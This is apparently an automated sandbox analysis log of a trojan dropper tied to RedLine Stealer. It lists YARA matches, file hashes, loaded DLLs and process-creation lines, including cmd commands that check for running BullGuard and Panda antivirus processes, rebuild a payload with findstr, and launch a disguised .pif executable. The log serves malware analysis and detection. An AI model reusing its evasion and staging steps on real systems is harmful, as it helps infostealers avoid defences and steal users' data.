          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0096D45D10_2_0096D45D
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009716B410_2_009716B4
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0095F6A010_2_0095F6A0
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0096F62810_2_0096F628
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0095166310_2_00951663
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009778C310_2_009778C3
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0097DBA510_2_0097DBA5
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00971BA810_2_00971BA8
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0096DD2810_2_0096DD28
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0097BFD610_2_0097BFD6
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00971FC010_2_00971FC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 19_2_013EF60819_2_013EF608
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\xBCzEiVyOcVH.dll 28AB9A0F5F50FD5398324B5EC099F5C53C6FAA701C3F6D8B0B3DA47A76C56230
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: String function: 00961A36 appears 34 times
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: String function: 00970D17 appears 70 times
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: String function: 00978B30 appears 42 times
          Source: xBCzEiVyOcVH.dll.10.drStatic PE information: Resource name: RT_MESSAGETABLE type: PDP-11 separate I&D executable not stripped
          Source: xBCzEiVyOcVH.dll.10.drStatic PE information: No import functions for PE file found
          Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe, 00000000.00000000.1163476792.000000000041C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSbieSupport.dllj% vs SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
          Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe, 00000000.00000002.1230068469.00000000047B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSbieSupport.dllj% vs SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
          Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeBinary or memory string: OriginalFilenameSbieSupport.dllj% vs SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
          Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
          Source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
          Source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
          Source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
          Source: 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
          Source: 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
          Source: 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
          Source: 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
          Source: xBCzEiVyOcVH.dll.10.drBinary string: \Device\IPT[
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/6@1/1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00407C28 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00407C28
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009A8DE9 AdjustTokenPrivileges,CloseHandle,10_2_009A8DE9
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009A9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_009A9399
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BB976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,10_2_009BB976
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_009B4148
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00403663 _wtol,_wtol,SHGetSpecialFolderPathW,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00403663
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_0040683D memcpy,SystemParametersInfoW,GetDC,GetDeviceCaps,MulDiv,ReleaseDC,GetModuleHandleW,FindResourceA,LoadResource,LockResource,DialogBoxIndirectParamW,0_2_0040683D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: user32.dll0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: user32.dll0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: sfxtest0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: sfxconfig0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: SfxString%d0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: SetEnvironment0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: SetEnvironment0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: SetEnvironment0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: HelpText0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: InstallPath0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: BeginPrompt0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: AutoInstall0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: AutoInstall0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: ExecuteFile0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: ExecuteFile0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: ExecuteFile0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: RunProgram0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: RunProgram0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: RunProgram0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: 7ZipSfx.%03x0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: setup.exe0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: setup.exe0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: setup.exe0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: Shortcut0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: Delete0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCommand line argument: SelfDelete0_2_00404AEB
          Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;BULLGUARDCORE.EXE&apos;
          Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;PSUASERVICE.EXE&apos;
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeVirustotal: Detection: 71%
          Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeReversingLabs: Detection: 57%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Bel.tmp
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq BullGuardCore.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "bullguardcore.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq PSUAService.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "psuaservice.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif Rarissima.exe.pif u
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\waitfor.exe waitfor /t 5 cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADw
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe" Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Bel.tmpJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmdJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq BullGuardCore.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "bullguardcore.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq PSUAService.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "psuaservice.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif Rarissima.exe.pif uJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\waitfor.exe waitfor /t 5 cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADwJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: nlaapi.dllJump to behavior
